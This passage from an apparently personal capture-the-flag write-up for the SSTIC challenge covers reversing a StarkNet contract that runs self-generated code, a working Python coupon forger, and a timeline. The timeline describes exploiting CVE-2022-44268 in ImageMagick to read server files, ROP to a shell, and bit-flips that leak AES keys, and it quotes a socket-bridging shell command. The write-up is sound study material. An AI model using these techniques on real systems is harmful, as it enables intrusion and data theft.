ids.write(id, 1);
nonce = nonce.read();
res = first(nonce, code_len, code);
second(res, a, b);
id_hash = hash2(nonce, id);
range_check(code_len - 3);
_validate(id_hash, code);
and range_check
are built-in functions. hash2
performs a Pedersen hash, while range_check
asserts that its input is in [0, 2^{128}). This code is pretty straightforward to understand. first
hashes the entire code by recursively applying hash2
with each element. second
checks that a < 2^{108}, b < 2^{128}, and that they combine to form the hash from first
. Notably, hash2
produces a 252-bit hash, but second
effectively requires h < 2^{236}, so some bruteforcing will be needed to achieve a small enough hash. Finally, validate
will check that code_len >= 3
, and feed the code and a hash of the ID into _validate
, which directly calls the mysterious j
looks like this:
// Function 19
func __main__.j{}(id_hash @ [FP-4] : felt, code @ [FP-3] : felt*)
offset 218: NOP
offset 220: CALL 7 # starkware.cairo.lang.compiler.lib.registers.get_ap
offset 222: ASSERT_EQ [FP], [AP-1] + 6 # storing get_ap result
offset 224: PUSH [[FP-3]+2] # code[2]
offset 225: PUSH 0x480680017fff8000
offset 227: PUSH [FP-4] # id_hash
offset 228: PUSH 0x400680017fff8000
offset 230: PUSH [[FP-3]] # code[0]
offset 231: PUSH 0x48507fff7fff8000
offset 233: PUSH 0x484480017fff8000
offset 235: PUSH 4919 # 0x1337
offset 237: PUSH 0x400680017fff8000
offset 239: PUSH 4918 # 0x1336
offset 241: PUSH 0x484480017fff8000
offset 243: PUSH [[FP-3]+1] # code[1]
offset 244: PUSH [AP-12] * [AP-10] # id_hash * code[2]
offset 245: CALL abs [FP]
offset 246: RET
This is very strange-looking. get_ap
gets a pointer to the top of the “stack”. Then, a bunch of strange values are pushed, followed by CALL abs [FP]
: the program jumps into the stack! This is basically dynamically generated code (Cairo shellcode?). Luckily, it’s not super complicated to disassemble this; I basically invented dummy values for all the variables, overwrote a chunk of j
‘s code in the program.json
file, and disassembled it again with Thoth:
offset 218: PUSH <id_hash> # 0xaaaaaaaa
offset 220: ASSERT_EQ [AP], <code[0]> # 0xbbbbbbbb
offset 222: ASSERT_EQ [AP], [AP-1] * [AP-1]
offset 222: ADD AP, 1
offset 223: PUSH [AP-1] * 4919
offset 225: ASSERT_EQ [AP], 4918 # 0x1336
offset 227: ASSERT_EQ [AP], [AP-1] * <code[1]>
offset 227: ADD AP, 1
offset 229: dw <id_hash * code[2]>
This tells us that we require code[0] == id_hash * id_hash
, 0x1336 == code[1] * code[0] * 0x1337
and code[2] * id_hash == <RET instruction>
. We see from program.json
that a RET is 0x208b7fff7fff7ffe
, so this leads to the following set of constraints:
code[0] = id_hash * id_hash
code[1] = 0x1336 / (code[0] * 0x1337)
code[2] = 0x208b7fff7fff7ffe / id_hash
where all math is performed in \mathbb{Z}_{p}.
With all of these constraints figured out, all that’s left is to code a coupon generator:
from starkware.crypto.signature.fast_pedersen_hash import pedersen_hash
import random
hash2 = pedersen_hash
nonce = 121485921437276981477059375547635758552
prime = 0x800000000000011000000000000000000000000000000000000000000000001
id = random.getrandbits(128)
id_hash = hash2(nonce, id)
code = [None] * 4
code[0] = pow(id_hash, 2, prime)
code[1] = 0x1336 * pow(code[0] * 0x1337, -1, prime) % prime
code[2] = 0x208b7fff7fff7ffe * pow(id_hash, -1, prime) % prime
h = hash2(hash2(hash2(nonce, code[0]), code[1]), code[2])
for i in range(10000000):
if i % 100 == 0: print("...", i)
code[3] = random.getrandbits(128)
h2 = hash2(h, code[3])
if h2 < (1<<236):
print("%x" % id)
print(",".join(["%x" % c for c in code]))
print("%x" % (h2 >> 128))
print("%x" % (h2 & ((1<<128)-1)))
Although it is a bit slow (up to a few minutes), it does eventually spit out a valid coupon:
Entering this coupon into the website works, and gives us the stage 3 flag SSTIC{408656932b4982e58600bc58c73ee09c9ceb170325de207fabc73801fbf67f0f}
Final Stage
After submitting a valid coupon to the server, we’re sent to a “success” page, which looks like a 404 page:
NFT purchase page
This page should not be accessible. If you got here, please contact the head pastry chef on his e-mail address.
In order to avoid spam, you must solve a captcha to get the e-mail address: CAPTCHA.
Clicking the link will download a tarball containing 24 little images:
It’s a classic jigsaw puzzle! I popped the pieces into my favorite Photoshop-alike, Photopea, and started reassembling. 10 minutes later, I had this:
From there, just read off the email address [email protected] and send an email to finish!
Solution Summary
This is a quick summary of the solution; for details, consult the relevant sections of the writeup.
- Stage 0
- Examine the NFT contract and base-64 decode the
to get https://nft.quatre-qu.art/nft-library.php?id=12. - Change the ID in the URI to
and visit that to get a flag.
- Examine the NFT contract and base-64 decode the
- Stage 1
- The website uses an outdated version of ImageMagick to resize PNGs at https://nft.quatre-qu.art/nft-library.php.
- Exploit CVE-2022-44268 to exfiltrate the PHP script (containing the flag), then exfiltrate the backup files mentioned in the script.
- Stage 2a
- The way the nonce is generated causes the generated s_1 value to be a linear function of five unknowns (powers of the private key).
- Run
to extract the linear equations from the provided log file, paste them intosolve.sage
, and run that script to get the private key.
- Stage 2b
- Use
and Graphviz to visualize the circuit. Observe that the circuit on the rightmost side implements a timing loop. - Check the values of gates
at each step to determine that the password must be 80 steps (80 bits) in length. - Run
to obtain a password,995b90996f4564409191
. - Run the original
to get the private key.
- Use
- Stage 2c
- Run
to exploit the front-end by overflowingmsgs
and overwriting ajmp_buf
, then dump the firmware for the backend. - Run
a few times to exploit an overflow in theencrypt
functions in the backend to flip certain bits in the backend’sjmp_buf
and use that capability to leak the AES key from the stack.
- Run
- Stage 2d
- Stage 3
- Sign a challenge message on https://trois-pains-zero.quatre-qu.art/admin/login using
. - Run
to make a new coupon. - Submit the generated coupon to https://trois-pains-zero.quatre-qu.art/achat/redeem.
- Sign a challenge message on https://trois-pains-zero.quatre-qu.art/admin/login using
- Final Stage
- Download the CAPTCHA package, put the jigsaw pieces into an image editor, and solve the jigsaw.
- Read the email address in the resulting image.
Here’s an approximate timeline of my solution process, reconstructed via web browsing history, shell history and file timestamps. All times are local (GMT-7).
- 3/31 10:01am: Start on the challenge. Download the NFT from OpenSea and check if there’s anything hidden inside the file. Nothing found.
- 3/31 10:03am: Find the contracts on Etherscan. Base64-decode the
and find the https://nft.quatre-qu.art/nft-library.php?id=12 URL. - 3/31 10:04am: Transcribe the flag text from https://nft.quatre-qu.art/ by hand, having not found a nice way to extract it from the SVG (it’s an embedded PNG).
- 3/31 10:05am: Submit stage 0 flag.
- 3/31 10:06am: Enumerate and download all NFTs in case there’s anything interesting
- 3/31 10:12am: Starting to research ImageMagick exploits. Try ImageTragick before realizing that the service only accepts PNGs.
- 3/31 10:25am: Find out about CVE-2022-44267 and CVE-2022-44268. Confirm that the PNG file posted on https://www.metabaseq.com/imagemagick-zero-days/ works and leaks
. - 3/31 10:35am: Start working on an automated downloader which will automatically construct the PNG, POST it, download the resulting image, and save the exfiltrated file.
- 3/31 10:55am: Download
successfully after fixing some bugs. Submit the stage 1 flag. - 3/31 11:00am: Download, unpack and start going through the contents of
. - 3/31 11:15am: Decide to start by grabbing the Starknet blockchain contract for stage 3, before anyone else interacts with the blockchain and confuses the history. Spend half an hour trying to get the starknet-py dependencies to install properly.
- 3/31 11:45am: Grab all three blocks in the testnet blockchain and the code for the validate contract class:
. - 3/31 12:05pm: Use Thoth to disassemble and decompile the contract. A quick look tells me it’s the right class, and that there’s definitely something worth reversing here. Decide to defer actually reversing it to later: I need to start getting private keys.
- 3/31 12:17pm: Start looking at device A. Quickly zero-in on the weird looking
function. Initial attempts to crack the private key using step 1 data fails – it’s hard to recoverr
, and the structure ofget_nonce
does not help in that case. - 3/31 12:45pm: By sketching out the equations for step 2, the linear structure reveals itself. Modify my script to extract out the linear equations.
- 3/31 1:14pm: Obtain the private key for stage 2a.
- 3/31 1:24pm: Turn my attention to device B. The structure of the program immediately suggests a circuit of some kind.
- 3/31 1:37pm: Start trying to turn the circuit into a graphical diagram. Lots of fiddling with Graphviz; finally produce a halfway usable script and diagram.
- 3/31 2:45pm: By examining the relatively-isolated cluster of nodes on the right edge and printing relevant values during the circuit’s execution, I was able to determine that the password must be 80 bits long.
- 3/31 2:58pm: Fruitless explorations of the large circuit. It’s simply too complicated.
- 3/31 3:20pm: Hit upon the idea of just using Z3 to solve the whole thing. Rewrite the seedlocker script into something more Z3-friendly. Run it and wait.
- 3/31 3:38pm: Get a usable password,
, from z3. - 3/31 3:40pm: Obtain the private key for stage 2b by entering the password into the original script.
- 3/31 3:41pm: Get a virtualenv running for
so I can submit flags for stages 2a and 2b. - 3/31 3:42pm: Start looking at device C by reversing
. - 3/31 4:45pm: Starting to script basic interaction with the service and get it running locally. Lack of
setsockopt(..., SO_REUSEADDR, &one)
is very annoying! - 3/31 5:45pm: Have the ability to leak the contents of the
. Exploit plan seems clear. Now looking for useful gadgets in the frontend service binary. - 3/31 6:05pm-10:55pm: Attend a hockey game.
- 3/31 10:58pm: Configuring a faster (multithreaded) PoW solver to save myself some time with the remote exploit.
- 3/31 11:09pm: Leak the contents of
from the remote machine, confirming that ASLR is on. - 3/31 11:13pm:
contains a libc address, so start looking at libc gadgets. A lot more options! - 3/31 11:20pm: Try to override
using a preload library to injectsetsockopt(..., SO_REUSEADDR, &one)
locally for debugging. It does not work and I waste 30 minutes trying to figure out various ways to forcefully close the server socket to enable faster local iteration, to no avail. - 3/31 11:40pm: Get a local debugging setup going using
qemu-user -g
and GDB. - 4/1 12:33am: Successfully corrupt
to jump into the middle of the firmware dump routine, obtaining a copy of the backend firmware file! Start reversing it in Ghidra, but it looks truncated. - 4/1 2:29am: Successfully ROP the front-end to get a shell. Dump the accessible files and determine that
is the same as thefirmware.bin
I dumped earlier, andbox-B
(the actual backend binary that’s running) is inaccessible. Back to reversing the truncated binary. - 4/1 2:52am: Not getting far with reversing, so I decide to over-engineer an interactively-controllable ropchain into my frontend exploit so I can talk to the remote backend. This works, but takes me a good two hours to build.
- 4/1 4:43am: Check the scoreboard and see that someone’s solved 2.d. Decide to switch to that challenge in case it’s easier.
- 4/1 4:46am: Skim a paper on “laser fault injection” from SSTIC 2020. It’s not that useful.
- 4/1 4:55am: Check the plot of the
and take a guess at what’s going on. The data is so clean (artificial) – no noise! - 4/1 5:12am: Obtain the private key for stage 2d. Back to Stage 2.c.
- 4/1 5:40am: Find the overflow in the
backend operations. Start trying to figure out how to overflow the message count field without crashing the service. - 4/1 6:55am-10:25am: Sleep.
- 4/1 11:26am: Wonder if maybe the backend isn’t using real AES. Start writing a Unicorn script to emulate the AES routines.
- 4/1 11:45am: Result: it’s real AES.
- 4/1 12:45pm-4:00pm: Family outing.
- 4/1 4:49pm: I’ve finally managed to figure out most of the memory layout of the backend’s BSS, including where the IVs and
are. Still no good ideas on how I can exploit this. Take a break. - 4/1 5:25pm: After the break, decide I should just go ahead and do everything I can for stage 3, so if/when I get the stage 2c key I can finish everything up quick. Start writing a MuSig2 signing script.
- 4/1 6:00pm: Script is done and seems to work for the test keys. Start looking at the StarkNet contract.
- 4/1 7:26pm: Figure out that
in the contract is constructing a new function “on the stack” and jumping to it. Disassemble the generated code to figure out this last bit of validation. - 4/1 7:53pm: Have the entire validation algorithm pretty much figured out, with a sketch of a key generator. Back to stage 2c.
- 4/1 8:00pm-8:25pm: Go for a walk. During the walk, it hits me: we can use a “matroshka doll” setup to induce bit flips in the
via repeated CBC encrypt/decrypt operations, without leaking it! - 4/1 8:27pm: Get home and start testing the idea. It works in a toy setup…
- 4/1 9:02pm: Realize that I can just use
system("cat <&4 >&5 & cat <&5 >&4")
when exploiting the frontend to connect the backend and frontend sockets together, bypassing the need for the fancy programmable ropchain entirely. - 4/1 9:30pm: Start implementing a fancy Python-based emulation of the backend’s encrypt/decrypt operations so I can develop and debug the bit-flip attack.
- 4/2 1:28am: After several hours of debugging and some insane workarounds, I finally have something that can flip bits in the
‘s savedlr
. - 4/2 1:39am: Jump to somewhere inside the get-firmware handler to leak some memory from the firmware stack.
- 4/2 2:40am: Fail to find any viable jump targets that will leak the AES key. Decide I’m going to need to flip bits in the saved
too, which is much more complicated. - 4/2 4:30am: Finish implementing the attack that flips bits in both
. After trying several combinations oflr
without succeeding, decide to just bruteforcesp
values remotely. - 4/2 4:39am: While bruteforce is running, write a script to generate a coupon for the last step of stage 3.
- 4/2 4:57am: Generate a valid coupon for stage 3.
- 4/2 5:00am: Continue tweaking the parameters for bruteforce and managing the workers.
- 4/2 7:18am: Discover that my current approach cannot possibly work because
overwrites too much of the stack. Start looking for other targets. - 4/2 7:40am: Hit upon the idea of constructing a “fake stack” via decrypt that can be used to leak stack contents in the get-firmware handler – including the AES round keys.
- 4/2 7:58am: Start running the new exploit in parallel.
- 4/2 8:04am: The exploit lands, dumping out the round keys. Obtain the private key for stage 2c!
- 4/2 8:11am: Use the four private keys to sign the admin session message and get to the redemption page.
- 4/2 8:12am: Submit my pre-generated coupon – it works on the first try! Obtain the stage 3 flag.
- 4/2 8:13am: Start using Photopea to piece together the puzzle pieces from the CAPTCHA.
- 4/2 8:22am: Email [email protected] to complete the challenge!
It was a pretty wild ride this year! I liked the parallel design, since it meant that I could work on other parts while blocked. I regret missing the “easy” solution to 2.c, but I am happy I was able to solve it anyway – and I think my technique is kind of neat, despite being rather difficult to apply. I enjoyed the focus on cryptography and a bit of signal processing (2.d), and I would definitely love to have harder signal-related challenges in the future. As usual, I loved the opportunity to learn new things and try out a range of skills and concepts – onwards to next year!